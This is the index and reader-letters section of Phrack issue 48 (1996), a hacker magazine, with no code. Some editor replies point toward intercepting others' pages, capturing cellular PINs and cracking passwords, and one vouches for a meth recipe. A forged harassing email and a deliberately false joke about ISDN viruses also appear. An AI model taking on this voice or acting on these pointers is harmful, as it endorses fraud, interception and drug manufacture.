Phrack #48













                              ==Phrack Magazine==

                   Volume Seven, Issue Forty-Eight, File 1 of 18

                                 Issue 48 Index

                               P H R A C K   4 8

                               September 1, 1996

~ WARNING!  This is a TOP SECRET-MAGIC EYES ONLY document containing
compartmenalized information essential to the national security of the
United States.  EYES ONLY ACCESS to the material herein is strictly
limited to personnel possessing MAGIC-12 CLEARANCE LEVEL.  Examination
or use by unauthorized personnel is strictly forbidden and is punishable
by federal law. ~

Yes, it's the annual issue of Phrack you've all been waiting for,
hopefully you have kept your security clearances current.  The delay has
been a long one, much longer than anyone would have liked.  Obviously
Phrack was never meant to be put out so infrequently, but the
continual pressures of daily life have taken their toll on yet
another editor.  Yes, those little things like going to work, paying
the rent and all the other hassles that interfere with putting out a
large quarterly hobbbyist publication.

It finally came down to three choices:  keep the status quo and put out an
issue whenever, charge per issue, or get in some new blood.  Obviously the
status quo sucked, and an issue a year was just unacceptable.  Charging
everyone was even more unacceptable, even though "Information wants to
be $4.95."  So, that left bringing in more people to help.

The hard thing was finding people worth bringing into the fold.
There was never any shortage of people who wanted to take over the
whole magazine, but it wasn't until three of them banded together and
volunteered to take over the main editorial nightmare that it looked
like there was a light at the end of the tunnel.  Voyager, maintainer of
the #hack FAQ and editor of CoTNO, RedDragon editor of FeH and
continual discoverer of Linux root bugs, and Daemon9 admin of InfoNexus and
text file author extraordinaire, came forward en masse and said,
"We'll do it."

Most of you have no idea how hard it is to put out a magazine like Phrack
with any degree of regularity.  You have to track down articles, answer
tons of mail, read all kinds of news, edit the articles (most of which
were written with English as a second languge,) maintain the mailing
list, maintain the WWW site, etc.  Hopefully with all the new
people involved, the new division of labor will allow everyone to
contribute and put out a magazine in a very timely fashion.  (And allow poor
old Erikb to rest easy knowing the magazine is being taken care of so
he can devote more time to being a puppet-like stooge of The Man.)

In any case, you've waited long's Issue 48.


                        READ THE FOLLOWING


Corporate/Institutional/Government:  If you are a business,
institution or government agency, or otherwise employed by,
contracted to or providing any consultation relating to computers,
telecommunications or security of any kind to such an entity, this
information pertains to you.

You are instructed to read this agreement and comply with its
terms and immediately destroy any copies of this publication
existing in your possession (electronic or otherwise) until
such a time as you have fulfilled your registration requirements.
A form to request registration agreements is provided
at the end of this file.  Cost is $100.00 US per user for
subscription registration.  Cost of multi-user licenses will be
negotiated on a site-by-site basis.

Individual User:  If you are an individual end user whose use
is not on behalf of a business, organization or government
agency, you may read and possess copies of Phrack Magazine
free of charge.  You may also distribute this magazine freely
to any other such hobbyist or computer service provided for
similar hobbyists.  If you are unsure of your qualifications
as an individual user, please contact us as we do not wish to
withhold Phrack from anyone whose occupations are not in conflict
with our readership.


Phrack Magazine corporate/institutional/government agreement

   Notice to users ("Company"):  READ THE FOLLOWING LEGAL
AGREEMENT.  Company's use and/or possession of this Magazine is
conditioned upon compliance by company with the terms of this
agreement.  Any continued use or possession of this Magazine is
conditioned upon payment by company of the negotiated fee
specified in a letter of confirmation from Phrack Magazine.

   This magazine may not be distributed by Company to any
outside corporation, organization or government agency.  This
agreement authorizes Company to use and possess the number of copies
described in the confirmation letter from Phrack Magazine and for which
Company has paid Phrack Magazine the negotiated agreement fee.  If
the confirmation letter from Phrack Magazine indicates that Company's
agreement is "Corporate-Wide", this agreement will be deemed to cover
copies duplicated and distributed by Company for use by any additional
employees of Company during the Term, at no additional charge.  This
agreement will remain in effect for one year from the date of the
confirmation letter from Phrack Magazine authorizing such continued use
or such other period as is stated in the confirmation letter (the "Term").
If Company does not obtain a confirmation letter and pay the applicable
agreement fee, Company is in violation of applicable US Copyright laws.

    This Magazine is protected by United States copyright laws and
international treaty provisions.  Company acknowledges that no title to
the intellectual property in the Magazine is transferred to Company.
Company further acknowledges that full ownership rights to the Magazine
will remain the exclusive property of Phrack Magazine and Company will
not acquire any rights to the Magazine except as expressly set
forth in this agreement.  Company agrees that any copies of the
Magazine made by Company will contain the same proprietary
notices which appear in this document.

    In the event of invalidity of any provision of this agreement,
the parties agree that such invalidity shall not affect the validity
of the remaining portions of this agreement.

    In no event shall Phrack Magazine be liable for consequential, incidental
or indirect damages of any kind arising out of the delivery, performance or
use of the information contained within the copy of this magazine, even
if Phrack Magazine has been advised of the possibility of such damages.
In no event will Phrack Magazine's liability for any claim, whether in
contract, tort, or any other theory of liability, exceed the agreement fee
paid by Company.

    This Agreement will be governed by the laws of the State of Texas
as they are applied to agreements to be entered into and to be performed
entirely within Texas.  The United Nations Convention on Contracts for
the International Sale of Goods is specifically disclaimed.

    This Agreement together with any Phrack Magazine
confirmation letter constitute the entire agreement between
Company and Phrack Magazine which supersedes any prior agreement,
including any prior agreement from Phrack Magazine, or understanding,
whether written or oral, relating to the subject matter of this
Agreement.  The terms and conditions of this Agreement shall
apply to all orders submitted to Phrack Magazine and shall supersede any
different or additional terms on purchase orders from Company.



We have approximately __________ users.

Enclosed is  $________

We desire Phrack Magazine distributed by (Choose one):

Electronic Mail: _________
Diskette:        _________  (Include size & computer format)

Name:_______________________________  Dept:____________________





Country/Postal Code:___________________________________________

Telephone:____________________   Fax:__________________________

Send to:

Phrack Magazine
603 W. 13th #1A-278
Austin, TX 78701

Enjoy the magazine.  It is for and by the hacking community.  Period.

               Editors : Voyager, ReDragon, Daemon9
               Mailboy : Erik Bloodaxe
                 3L33t : Mudge  (See Below)
                 Short : Security Dynamics (NSDQ:SDTI)  (See Above)
          Myers-Briggs : ENTJ
                  News : Datastream Cowboy
    Prison Consultants : Co / Dec, Tcon
Sick Sexy Horror Chick : Poppy Z. Brite
             Thanks To : Cherokee, Damien Thorn, Boss Hogg, StaTiC,
                         Sendai, Steve Fleming, The Guild
                         Obi-1, Kwoody, Leper Messiah, Ace
                         SevenUp, Logik Bomb, Wile Coyote
     Special Thanks To : Everyone for being patient

Phrack Magazine V. 7, #48, September 1, 1996.   ISSN 1068-1035
Contents Copyright (C) 1996 Phrack Magazine, all rights reserved.
Nothing may be reproduced in whole or in part without written
permission.  Phrack Magazine is made available quarterly to the
amateur computer hobbyist free of charge.  Any corporate, government,
legal, or otherwise commercial usage or possession (electronic or
otherwise) is strictly prohibited without prior registration, and
is in violation of applicable US Copyright laws. To subscribe, send
email to and ask to be added to the list.

                    Phrack Magazine
                    603 W. 13th #1A-278              (Phrack Mailing Address)
                    Austin, TX 78701

                                 (Phrack FTP Site)

                   (Phrack WWW Home Page)

                            (Phrack E-mail Address)
                 or phrackmag on America Online

Submissions to the above email address may be encrypted
with the following key : (Not that we use PGP or encourage its
use or anything.  Heavens no.  That would be politically-incorrect.
Maybe someone else is decrypting our mail for us on another machine
that isn't used for Phrack publication.  Yeah, that's it.   :) )


Phrack goes out certainly can subscribe in plaintext.

Version: 2.3a



  -= Phrack 48 =-
 Table Of Contents
 1. Introduction by the Editorial Staff                           13 K
 2. Phrack Loopback / Editorial                                   55 K
 3. Line Noise (Part I)                                           63 K
 4. Line Noise (Part II)                                          51 K
 5. Phrack Pro-Philes on the New Editors                          23 K
 6. Motorola Command Mode Information by Cherokee                 38 K
 7. Tandy / Radio Shack Cellular Phones by Damien Thorn           43 K
 8. The Craft Access Terminal by Boss Hogg                        36 K
 9. Information About NT's FMT-150/B/C/D by StaTiC                22 K
10. Electronic Telephone Cards (Part I)                           39 K
11. Electronic Telephone Cards (Part II)                          66 K
12. Keytrap Revisited by Sendai                                   13 K
13. Project Neptune by Daemon9                                    52 K
14. IP-Spoofing Demystified by Daemon9                            25 K
15. Netmon by Daemon9                                             21 K
16. The Truth...and Nothing but the Truth by Steve Fleming        19 K
17. International Scenes by Various Sources                       33 K
18. Phrack World News by Datastream Cowboy                        21 K

                                                    Total:       633 K


"The culture of criminal hackers seems to glorify behavior which would be
classified as sociopathic or frankly psychotic."
(Mich Kabay, director of education, NCSA, NCSA News, June 1996)

"The Greek word 'diarrhein,' which means 'to flow through,' describes
diarrhea very well."
(Gross-ology by Sylvia Branzei, Planet Dexter, 1996)

"Fuck you, clown!"
(Thee Joker, Defcon IV, July 28, 1996)


                              ==Phrack Magazine==

                   Volume Seven, Issue Forty-Eight, File 2 of 18

                                Phrack Loopback


        This is a response to the letter from KoV included in "Line Noise
Part I" from Phrack #47.  After reading this open letter, I nearly died of
laughter.  The inaccuracies of KoV's story were numerous and comical.
However, from the way KoV presented themselves, they are acting as if
it was their BBS network and a government conspiracy that has gotten
them into trouble.  As a result, they will appear to many as a
wrongfully persecuted group of computer users.

        Apparently, KoV likes to fancy themselves as a group that
spread "open-minded" and "sociopolitical" beliefs through their BBS
network, KoVNet.  They claim that they "questioned [the] authority" of
those who "tried to oppress [their] free-thinking minds."  They then
state that this caused the "AmeriKKKan" government to monitor their
actions, "stalk [them] in public places", and and attempt to destroy
them "from the moment of KoV's conception."  

        This is ridiculous.  First off, their BBS network was not
enough to cause the government to stalk them in public.  If a BBS
network that contains disdain for the American government justifies
the stalking of its users, then NUMEROUS people in this country are
currently being followed in public.  Therefore, KoV's claim about
their threatening BBS network is an attempt to make 
themselves look bigger and more important than they were.

        Now, let us look at the real reason they are facing legal
actions.  KoV is blaming "false accusations from a local university"
for their troubles.  However, the accusations are not false and
after you read what led them to be caught, you will reallize that KoV
was never a threat to the government.

        I do not know exactly how many universities they hacked.
However, if it is one local university as they claim, it is Skidmore 
in Saratoga Springs NY, the university which I attend.  I myself have played
around with Skidmore's computers and do not feel any loyalty or
patriotism to my school.  Therefore, it is not a grudge I am harboring
against KoV for hacking Skidmore's system that is causing me to write
this.  It is merely the fact that KoV is distorting the truth in an
attempt to turn themselves into martyrs. 

        Personally, I cannot blame anyone for breaking into Skidmore's
system.  Since Skidmore was relatively new to the Internet, their
security was very lax making it very easy to explore and play around
with the system.  If KoV had any knowledge whatsoever, they would not have
been caught or even detected by Skidmore.  It was their egos and lack
of knowledge that led to their investigation.  I myself saw with my
own eyes how they were detected.

        The system that was hacked by KoV was
Well, one day I took a look at the system logs for WOPR and saw "root
login from [some out of domain ip address]" standing out quite well.
If KoV was really so Knowledgable and dangerous, wouldn't they know how to
edit system logs?  However, they did not which shows KoV is another
example of people who managed to obtain root access and did not know
what to do with it.

        Some people would think, "Big deal! Just because they didn't
edit the system logs does not mean that they could ever be linked to
the crime."  This is very true.  However, this would have required KoV
to keep their mouths shut about the incident.  Yet, they did not.
Apparently, Lord Valgamon made a post to some of the BBS networks he
frequented where he showed off about hacking Skidmore and told
everyone how he did it.  

        This hurt KoV greatly.  As a result, a narc on the BBS network
alerted CERT about Lord Valgamon's claims who, in turn, reported the
incident to Skidmore.  This caused Skidmore to now have a name, though
anonymous, to apply to the break in.  Consequently, the proper
authorities became involved and they began to track down Lord Valgamon
on the BBS networks.

        From the above facts, you can probably guess that the
"AmeriKKKan" government would never have a special interest in KoV
because they are the typical stereotype of an "ELiTE M0DeM d00d."  If
Lord Valgamon and KoV had kept their mouths shut about the incident,
they never would have been caught.  However, KoV needed to tell their
ELiTE BBS scene how bad-ass they were and, as a result, their
bad-asses are getting spanked hard.  

        KoV had not done any crime or brought up any controversy
against the government.  Their only crime was that they were stupid.
I understand that KoV is now asking for the support of the h/p and
political groups in the scene.  However, I would not recomend anyone
to give them support.  There was no government conspiracy against KoV
and everything that has happened to them was brought on by their own
stupidity.  Do not turn a bunch of egotistical and immature criminals
into martyrs.  I will end this with the same words KoV started their
letter with: "Don't believe the hype." - Public Enemy.

Mr. Sandman

[ Wow.  Well, we always like to hear all sides to any story, and each
  time something gets published that gets under someone else's skin, we
  inevitably do.  Thanks for writing! ]



Let me tell some words about myself. Computers and
telecommunications take quite important place in my life. In
past I worked as a programmer, system administrator and finally
I ran my own business selling computer hardware (now I have
closed this business because I have lost my interest for trade
and due to some financial reasons). I owned my own BBS for
several years but now I have it shut down because I do not want
support lamers leeching files 2-3 years old and having no ideas
what email is. Now almost every day I spent many hours reading
Internet newsgroups, mainly dedicated to phreaking/hacking.

A friend of mine, gave me some Phrack issues (newest was #42 of 1993).
I have read them and like them very much.

If it is possible, please drop me a line how could I subscribe
to Phrack magazine. If you do, please encrypt your reply and
send it via anonymous remailer, because now Russian government
begun to control email messages very thoroughtly.

I have private information from friend Internet provider about
the FAPSI (Federal Agency of Government Communications and
Information -- some form of Russian NSA/FCC hybrid formed from
ex-KGB agents) actions aimed to control data passed through
Internet channels in Russia. FAPSI ordered all Internet
providers in St.Petersburg to install software which task will
be to copy all messages addressed to/from persons which FAPSI
interested in and to scan for some keywords specified by FAPSI.

Providers will get their licences for providing communication
service only after installing such spy software. There is a
rumour that FAPSI has installed hidden microphones (bugs) in
providers' offices to control any "illegal" activity (free
information exchange always was illegal in USSR/Russia). I say
"rumour" because I have heared it only from one trusted source,
other information came from several trusted sources

BTW, using a PGP is illegal in Russia too, because FAPSI can not
break the PGP-encrypted messages.

If you find information written above meaningful, you may use it
in your own discretion but with some precautions -- remember
that country I live in have barbaric laws and Russian
Police/Security Services have _absolute_ power to put in jail
anyone they want without any court or warrant.

[ Normally I strip out all anonymous remailers, because they
 interfere with the bulk mailing process, bounce mail, and generally
 screw things up...however, there are always exceptions.

 The FAPSI requirements are extremely interesting to hear about.  It
 certainly makes sense, and I fear that our country is likewise heading
 towards that goal.

 If you get the chance, you ought to write more about being a hacker
 in your country, since I am sure the rest of the world would be
 fascinated by it. ]



I looking for just a nibble of information...

When one logs into a remote system and gets login and passwords questions 
how does one write a program to crack a password...

I'm sure that is not an easy question or even a nibble perhaps a byte...

Seeking Info,

[ Well, I can't tell you how to write a program to crack passwords
  without knowing what kind of system you want to crack passwords for.

  I can't tell you how to say "Where is the bathroom" in a foreign
  language without first knowing what language you want to say it in.

  If you are talking about UNIX passwords, there are already numerous
  programs written to "crack" passwords.  I would suggest you go poke around
  and look for programs like "crack" or "killer cracker."  If you
  can't find reference to either of these on the net, then you really
  ought to consider finding a new hobby. ]


Wuzup! I have a pager that I don't use anymore because I can't afford the
bill.  So I was wondering if there is anyway I can hook-up my pager for free
without going through a paging service.

[ Depending upon the pager, you can possibly change or add capcodes through
  special programming software.  Almost all Motorola pagers allow you to do

  This won't allow you to "really" get free service, but you can piggy back
  on top of some known person's pager service (or just intercept their pages.)

  The only way to get "free" service is to reactivate the pager's current
  capcode in the paging system from the local provider who owns the frequency
  the pager is crystaled for. ]


I was browsing through Issue 47, and saw something that had caught 
my eye.

This t-shirt chronicles the infamous "Hacker War" between rival
groups The Legion of Doom and  The Masters of Destruction.  The front
of the shirt displays a flight map of the various battle-sites
hit by MOD and tracked by LOD.  The back of the shirt
has a detailed timeline of the key dates in the conflict, and
a rather ironic quote from an MOD member."

A few weeks ago, I read the book Masters of Deception, a book about
the "war".  Wasn't the name of the rival group Masters of Deception?  
I assume that Erik would know, he appeared to be the main "villain" in 
this version of the story.  Any response would be appreciated.

[ I was the villain?  Well corn my pone.

  In any case, you should always take everything you read with a grain of
  salt.  In my opinion, the book was a piece of shit.  Since many of the
  MOD members decided to viciously attack the author, Josh Quittner, posing
  as the ILF, I can only assume that they felt likewise.

  So you decide for yourself about all that.  Oh, and buy the damn
  t-shirt. ]


Hi Can you teach me to be a hacker i think that that would be cool so what do
you think can you teach me to be a hacker and to be cool you are one of the
biggest hackers in the world

[ No, I'm afraid as one of the biggest hackers in the world, I'm far too
  important to expend any energy on the likes of you.

  Now go back to your PlayStation and get better at Toshinden. ]


Where culd i find some zipped red box tones? Or blue box.

[ Make your own tones with the Blue Beep program.

  Follow some of the links from the Phrack Home page, and you should
  find this program on any number of sites. ]


Hallo, din Gamle rn!!
(Norwegian for: Hello, you Old Eagle!!(direct.translated.)
(rn(Eagle) is pronounced like: earn ) End of Norw. lesson.

This is a question from one viking to another; I am a newbie in the H/P
division so I spend my days(and nights!) dwnloading all i can find about the
subject. But I do have some problems with the cellular phone system over
here, NMT 900. Which your system AMPS have stolen all the good parts from!
Untill last year i could program my cellular phone, Ericsson NH 99, by
programming and switching the 27c512 prom. But now the norwegian
telecompany Telenor Mobil has inserted pin codes, i.e. if my cellular phone
number used to be 12 34 56 78 (we have 8 digits), then my phone number now
has changed to 12 34 56 78 XX X. Where the 3 last digits are unknown to the
owner of the phone.

I do have programs and cables for programming the phone with all 8+3 digits,
but then I have to know the 3 digits, the pin code, and I do NOT know how
to download them from the cellular traffic going around my place. Can you
help me beat the system? How do I dwnload the pin code???? I read that they
are going to use the same system i the N.Y. area within this year, so someone
is going to ask you these qst. sooner or later. Be prepared! Or is my qst.
old news? Maybe everyone knows how to do this? Exept the norwegian newbie....

Vennlig hilsen
(thats:Best regards)

Stian(Mr.Phonee) Engerud

[ I'm not sure I understand how the last 3 digits can be unknown to the
  owner of the phone.  If your number changes, then obviously you have to
  know the new number.  Are you sure this isn't just a touch-tone PIN
  entered in when you use phone, like systems over here in the states?

  If it is, then you'll still need some kind of ESN reader, or other means
  to decode the reverse channel, and a 900 mhz-capable radio and a touch-tone
  decoder to grab the PINS as well.  It's incredibly annoying.

  On another note, I thought Telenor Mobil had AMPS, ETACS and GSM systems
  in place.  Have they upgraded their ETACS systems as well?  If not,
  use those. ]


From: (Ron Zalkind)
Subject: Phrack Magazine: Strategic Marketing Partnership

I'm one of the principals of a new Internet-based, second-generation,
Information Technology service. This new Internet service debuted last week
at the Culpepper Forum in Atlanta. I'd like to propose a strategic marketing
partnership with Phrack Magazine. This proposal will spell out what it is
our service does (including a product demo), how we think a partnership with
Phrack Magazine might work, and how we can all increase profits by doing so.
Please reply to this E-mail with the name and E-mail address of the
'director of online strategy', or the 'circulation director', for Phrack
Magazine. Thank you.

Ron Zalkind, President
R.E. Zalkind & Co. Inc.
Voice: 770-518-1600
Fax: 770-642-0802
E-mail: (Ron Zalkind)
Ron Zalkind

[ WOW!  I can't wait to hook up with THESE incredibly savvy people
  so Phrack can dramatically increase our profits.  Let's see, if we
  make any money, we'll see a 100% increase!  It's a no-lose

  Man, I hate Internet mass-mailers.  Don't these people attempt to qualify
  their leads even a LITTLE?  Strategic Marketing Opportunities with
  free computer hacker magazines?  Ron? Hello? ]


   First of all, great work on the 'zine all these years, hope to see 48
   I have an article from "Airman" magazine (I believe it was the April
1996 issue), the US Air Force magazine given to military members.  It
details the efforts of AFOSI (Air Force Office of Special Investigations)
to prevent hackers from breaking in to military computers.  Considering
it's coming from the military, it's not too badly written (the author
actually knew the difference between "crackers" and "hackers").  I don't
have a scanner, but I'd be more than willing to snail mail it to you.  I
just wanted to check and see if you guys already had it of not.  If you
don't, let me know, and I'll get it to you ASAP. 
   Keep up the good work....

[ We would definately like to see the text from this article.  Please
  forward it!

  In fact, if any of you readers ever come across ANYTHING you think is cool,
  email it to us, or snail mail it.  We love getting mail.
  We will print anything cool.  (And a lot of lame things too!)

  Just stop sending us credit histories and password files.  :)  ]


need access to xxx now

[   Uh, ok, let's see:

  Reserved Domain (W-GOV-DOM)

     Domain Name: W.GOV

     Administrative Contact, Technical Contact, Zone Contact:
           Internet Assigned Numbers Authority  (IANA)
                 (310) 822-1511

     Record last updated on 02-Dec-93.
        Record created on 01-Dec-93.

  Do you know what this means?  Duh. ]


Subject: Scientific Discoveries Minimize Aging (DHEA)

Take advantage of the amazing benefits of DHEA. In the search for the 
FOUNTAIN OF YOUTH, DHEA is a must README. People, age 70, feeling and 
acting 25.

Read the medical research  at .A quote from 
an article published by the New York Academy of Science written by Dr. 
  "DHEA in appropriate replacement doses appears to have remedial effects 
   with respect to its ability to induce an anabolic growth factor, increase 
   muscle strength and lean body mass, activate immune function, and enhance 
   quality of life in aging men and women, with no significant adverse effects."

Regain the eye of the tiger! Don't wait ! Click on:

To terminate from the Health Catalog, Reply to with
"remove" in the subject field. Bob Williams 206-269-0846

P.S.  You will find a full line of Vitamin, Supplements and OTC Health 
Catalog at

[ Yet another Mass mailing!  How many lame mailing lists are we on?
  You have to wonder about these things.

  But how angry can one get, knowing that DHEA is the FOUNTAIN OF YOUTH!
  I need to get me some of that.  A little DHEA, a little GHB, a little
  DMT, and you'll look younger, feel younger, and have the brain of
  a two year old.

  And besides, Jesus loves acronyms. ]


Do you listen to 2nur radio?  If so have you ever heard a band named
SOYLENT GREEN or GOITER on any of their shows?
please email me back

[ Nick, I hate to break it to you, but:

  IT'S PEOPLE!!!!! ]


From: Pete Shipley <>
Subject: Shipley owned, hacked and thrashed

Please distribute this letter freely:

This posting is being made from, and this is not forged e-mail.
Even though this mail is coming from Peter Shipley's account, I am not him.

Who am I?

That is unimportant except to say that I cannot take anymore of the
"DoC" crowd's BULLSHIT.  I would like to raise an issue with them, mostly
(but not all related to the incident at defcon).

To you drunken losers at defcon who had to fuck with Netta's speech (DoC
on hold here for a second, it wasn't just them):  If you didn't want to hear
Netta's speech (though in your opinion it may be monotone, boring or even
wrong) you DIDN'T HAVE TO STAY AND LISTEN TO IT.  There were some people that
WANTED to listen to the speech, but you all had to act like POMPOUS ELITIST
ASSES.  How different are you now from a government that would like to 
enforce censorship upon it's own people?

All I can say is "getbacks are a bitch".  A few things to consider:

1.	Shipley is an utter tool.  His whole appearance is a front.  If he's
such an awesome security specialist then why was he so easily owned?  Also
I bring into question some of the motives he has for harassing Netta Gilboa.
Her boyfriend (who is currenlty in jail) was known for continually hacking
(yes CONTINUALLY hacking) Peter Shipley.  I know this because I spoke with
Chris (n00gz) many times and was aware of this fact.

In my opinion Petey, anyone that is foolish enough to hire you to secure their
systems are idiots; whether it's the military, government, industry, a
business -- they should all just ask for their money back. You are a discredit
to your profession.

2.	Shipley is a coward.  Only cowards attack people weaker than them
but back away from a confrontation with someone of equal size or power.
Careful Peter -- next time don't piss off Bootleg, he might hurt that pretty
boy face of yours (though I admit, I would like to see it)

3.	Hackman was a gob of shit.  Peter Shipley has come to know his true
calling in life now (to wit: Webmaster).

4. 	The fangs make you look like a homo.  Maybe you are (nothing against
them actually, just stating a fact).

Shipley, se7en, (ayoung, where's your piglet account?).  Get a fucking life.
Maybe instead of contstantly going around "Searching for intelligent life"
perhaps you should stay home and secure your own systems.  You are all owned,
now don't you feel stupid?  You should.  You are.


-- galf@upt

[ This is almost funny.

  Notice I said, almost.

  You have to admit though, Shipley always comes with some damn fine
  women in tow.  Oh the things I did in my mind to that blonde...

  Something tells me that the author of this forged message could use a lot
  of Shipley hand-me-downs:  Women, contracts, references, etc... ]


Hey, I just watched the movie Hackers, and I was just curious to know if They
used you and the LOD to models the characters in the movie after? Alot of the
handles, and choice phrases they used  sounded awfully Farmiliar with what
went on, or at least what the book said went on. 


[ Actually, meds, the screenwriter hung around with "MOD" and other people from
  the New York hack scene and picked up some pointers, and then used
  people like Dead Lord and Emmanuel Goldstein as technical assistants.

  Or something like that.

  Please, don't ever associate "LOD" with this piece of shit again.  :) ]


A lot of people have read the article about Joe Engressia and his time in
Memphis where he was arrested by the police and banned from his dream of
working on phone lines.  Well, at the time when he was living on Union
avenue, my mother was in charge of payroll, hiring and the like at a local
switchboard. This was back in 1972 when the phone system was less of the
fuqup it is today.  Well, a friend of my mother's taught Mr. Engressia how to
cook and other related houshold things despite his handicap.  Shortly after
or before this, (I am unsure) he was arrested by the police.  I think this
was also about the time the interview was made.  Anyway, the local phone
companies would not touch him, not even to give him service.  My mother,
after talking with him decided to hire him as a phone consultant. (Her
opinion of his was that "He was so brilliant, it was scary, I mean REALLY
scary.")  She though he was a great "kid" (22 at the time) and was the best
consultant that they had.  He worked there for three years before moving.

 The last my mother heard was that he was living in a Denver high rise
working as a consultant to a corporation or something out there.  I only just
started talking with my parents about this today, but I am sure that they
will tell me more of him. 

   Oh, and my father was good friends of Joe too, he and Joe were Ham Radio
operators here in Memphis and my father still phreaks on them so I am sure
that Mr. Engressia does too.  Anyway, my father is teaching me how to hack,
and my mother is teaching me how to phreak, but she only knows a little of
outdated info and wants to get in touch with Joe.  If anyone, ANYONE has any
information about Joe, or if somehow this article gets to Joe, please let me
know at the following e-mail address: 

[ We used to call Joe on conferences a long time ago.  I could probably
  dig his contact information up, but I really doubt he'd appreciate his
  number being published in Phrack.

  Hell, if your parents are teaching you how to hack & phreak, then certainly
  they can find Joe.  He was always listed in Directory Assistance when
  we tracked him down years back.

  Have you even really looked for him?  ]


quick question For Bloodaxe.

Ok, I know you probably get this Alot,but I just have to ask?...

Did you Really Date Christina Applegate?

had to ask,

[ Man, now that is a rumor that I would love to have started myself.
  No.  Never dated her, never met her, never talked to her, never
  had any contact whatsoever.  Spent some time holding up some of her
  posters with one hand, but that's about it. ]


do you have any info on stealing magic cookies ??

[ No, but I can trade you these magic beans for your cow.  If you plant
  them they will grow high into the sky, towards the castle in the clouds
  where the giant lives with the talking harp and the goose that lays the
  golden eggs.

  Go read some of the WWW Security Lists, if you're talking about what
  I think you are.  There are also javascript routines that collect
  navigator cookies from clients hitting your page.  After briefly looking
  around, I can't find the specific sites to snarf them from.  Go do a
  webcrawler search for WWW security or javascript security. ]


Dear Phracks - I'm a Free Journalist from Germany and I'm going to write
an articel about ISDN and the possible danger which might happen to a 
company etc. getting hacked by some agnets, spies etc. from other 
countries. So I'm looking for indos about ISDN-Viruses, Hackers and
background infos.

Can you help me?

[ Wow, a "Free Journalist."  I thought that pesky national socialist party
  imprisoned all you guys.

  ISDN Viruses are quite possibly the worst thing to happen to computing
  since the creation of the Cellular Trojan Horse.  Basically, these viruses
  travel over the wires using the X.224 transport protocol, and seize the
  D channel using Q.931.  All SS7 data sent over the D channel is quickly
  compromized and re-routed to different signal transfer points, causing
  massive ANI Failure over the entire routing mesh.

  Rumor has it that the Internet Liberation Front was behind these viruses
  with heavy investement coming from the German Bundesnachrichtendienst's
  Project Rahab.  These hackers were paid with AT&T calling cards encoded
  with a polymorphic encryption scheme, and cocaine.

  You can quote me on this. ]


Well, i wanna make an offer, and a nice deal.
i am n editor in an H/P/C magazine of HFA ( universal H/P/C 
well, what i wanna offer is a joining both of the papers 
2gether, OR! u want more subscribes, we'll publish ya,
but adding 1 article from ya'r paper, saying from where it is.
so, if we can make this deal, contact me asap!

[ Let me see if I understand this, your "universal H/P/C group" has
  a magazine, and wants to do "Phrack" the great honor of merging
  with us, or printing our articles?  Wow.  What a deal.  You mean
  by linking up with you guys, we will hit a greater audience

  So, merging our roughly 10,000 direct email subscribers, and a roughly
  75,000 more WWW or misc. readers, adding in your readers, that should
  bring us up to 85,001 readers!  Universally!  FAN-FUCKING-TASTIC!

  Are there so many rocks for you people to crawl out from under?
  Sheesh! ]



I have a need for a network sniffer.  Specifically, one that will
sniff IEEE-802.3 packets and TCP/IP packets.  Any leads?

[ Well, gee, are there network sniffers that won't?

  Go do an archie search for tcpdump. ]


I was just strolling by you page:,
and found my link "Showgirl Video" (link to

I am the creator and webmaster for the site. If I can ever be
of assistance to you let me know.

We are one of the few sites in the world that has a live stage and
live 1 on 1 conferencing in one place.


[ Ya know, every time I'm in Vegas I make it out to Showgirl Video with
  a bucket of quarters and a healthy dose of bad intent.  I have to
  congratulate you guys for going on-line.  I love it when two of
  my favorite things come together (smut and computers).

  Unfortunately, The Vegaslive site is kind of pricey.  You guys seriously
  need a flat fee.  I suggest you look at a SUPURB site:

  That place has a flat fee, all you can eat pricing structure, the way
  God meant it to be.  Take note, and follow suit. ]


I have a Mitsubishi MT9 (MT-1097FOR6A) ..I program the NAM with the 
passw: 2697435 ...I need the passw to have access to SCAN or TAC 
function ...please, help me!



[ I'm not familiar with that phone, but I'd start off looking through
  Dr. Who's archive of cellular info at:

  If what you are looking for isn't there, there might be a link to
  somewhere that has it. ]


my name is azreal! I am also known as the angel of death.  why did you sell
out to the feds back when you running comsec.  i think phiber optick was a
great guy and i would have been glad to work with a legend.  do you know his
e-mail adress

[ Azrael?  The Angel of Death?  I thought Azrael was Gargamel's annoying cat.

  But to answer your question, I sold out to the man ages ago for money.
  Pure and simple.  Once you hit puberty, you might have a need for cash.
  Once mommie sends you off to college, you might need it even more.  And
  in the distant future, when you get out on your own, you will really

  Yes, phiber is swell.  There have been good pictures of him in many
  national magazines.  Try not to get the pages stuck together.

  And, yes, I do know his email address.  Thanks for asking! ]



How do you hack?

[ Very carefully. ]


Did you ever write a edition that deals with breaking the screensavers
code?  If so which one?  How about breking the Win95 password.  You know
the one that allows you into Win95?

[ We pass all articles about breaking Windows Screen Savers on to
  the more technical forum at 2600 magazine.

  To disable the Win95 password, install Linux. ]


A phriend of mine showed me your sight a few days ago at his house...I 
thought it was pretty cool.  I dloaded a few issues and stuff to check 
out...I haven't been on the internet to long so I'm still trying to phined 
more stuff that interest me,  and I would like to set up my own page like 
that but my account is thru the school...Is there anyway around that?  So 
it can be like border line legal?  How underground can one go???  If you 
still have the file on where the line is please send them...Thanks.

[ Your account is through your school, but you are looking for a way around
  that?  Hmmm...let me see.  I'm just going to throw out something wild
  and crazy, but, what the hell:  Maybe, get another account through
  another Internet provider?  I know, it's just too outlandish.  Forgive
  me for being so zany.

  How underground can you really go?  I used to have that file you are looking
  for, but I was so underground at the time, it got soiled with mud and
  disintegrated, eventually polluting the water table, and was ultimately
  drank by the city of Pasadena, Texas. ]


In regards to volume one ,issue four , Phile #8 of 11 ...
This shit has got to be a joke , I tryed to make some and 
Was a great dissapointment ????

[ The meth recipe works just fine.  Obviously you DIDN'T try to make it.
  If you feel like a REAL MORON, look at the cat recipe in the line noise
  section of this issue.  Stay up for a week, go into deep amphetamine
  psychosis and die!  Woo Woo! ]


I ve tried to locate these guys who have Black book for cracking 
passwords in major software and some games as well.They go by the Names 
of Jolly Reaper and Maugan Ra aka Manix.Iam doc X from London (not a 
pig!!!) if U happpen to know these doodez let us know.TA from GB

[ Perhaps you have Phrack confused with something having to do with
  pirated software.  I'd ask that question in a posting to the USENET
  group alt.warez or on the IRC #warez channels. ]


   i have been searching the internet for some kind of script that
will subscribe a certain email address to a shitload of
mailing lists...i have heard of such a thing.
what im lacking is that keyword to search for such as:


what is the technical term for this kind of attack?
or better yet, do you know where to get a hold of such a script.
